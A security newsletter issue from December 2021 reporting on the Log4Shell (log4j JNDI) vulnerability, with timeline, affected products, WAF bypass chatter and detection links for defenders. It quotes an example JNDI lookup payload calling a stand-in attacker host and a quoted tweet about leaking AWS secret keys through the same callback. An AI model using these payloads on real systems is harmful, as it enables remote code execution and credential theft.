BagheeraAltered's CyberSecurity Newsletter logo

BagheeraAltered's CyberSecurity Newsletter

Subscribe
Archives
December 12, 2021

CyberSecurity News -log4j week

December 12th

  1. Log4j added JNDILookup plugin in 2013

It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server

  1. Dec. 9, Chen Zhaojun of Alibaba Cloud Security Team discovered that  the vulnerability was first used on Minecraft and thought to involve only the gaming platform but quick exploration revealed that the vulnerability potentially affects any software using this library

Twitter avatar for @P0rZ9
p0rz9 @P0rZ9
Apache Log4j2 jndi RCE #apache #rce github.com/apache/logging…
Image
Image
2:25 PM ∙ Dec 9, 2021
766Likes308Retweets
  1. The log4j’s formatting language includes the ability to trigger code. So when a message containing the string ${jndi:ldap://attacker.com/pwnyourserver} is logged, Java will attempt to fetch the object referred to from the remote server, deserialize it and run the appropriate code

  2. Since Apache log4j is used in countless applications, the vulnerability also makes those applications vulnerable:- e.g.

    VCenter -https://www.vmware.com/security/advisories/VMSA-2021-0028.html

    Apple Iphone -

Twitter avatar for @chvancooten
Cas van Cooten @chvancooten
A story in three parts 😶 #log4j
Image
Image
Image
4:19 PM ∙ Dec 10, 2021
3,581Likes1,030Retweets

AWS Secret Keys

Twitter avatar for @Dinosn
Nicolas Krassas @Dinosn
${env:AWS_SECRET_ACCESS_KEY} is a new favorite item to add together with your collaborator string
10:37 PM ∙ Dec 11, 2021
429Likes88Retweets
  1. This has had blue teams and SOCs all over the world working hard this weekend, either patching or adding WAF rules.

  2. Added to this headache we have WAF bypasses that are constantly found: https://twitter.com/search?q=log4j%20waf%20bypass&src=typeahead_click&f=top

  3. Crowdstrike, Splunk and Sumologic have released detection methods:

    1. https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
    2. https://github.com/SumoLogic/sumo-log4j-appender
    3. https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  4. This vulnerability’s CVE was published on Friday the 10th, it was exploited for a while before that.

  5. Since social media is sharing exploitation payloads, (which happens with any exploit) and social media is constantly scraped for analytics and state monitoring, if the scraping tools use log4j they are accidentally exploited.

Rumble has published a list of vulnerable applications:

https://www.rumble.run/blog/finding-log4j/

@GossiTheDog has also published a list, this is uptodate and should be read by everyone

Don't miss what's next. Subscribe to BagheeraAltered's CyberSecurity Newsletter:
This email brought to you by Buttondown, the easiest way to start and grow your newsletter.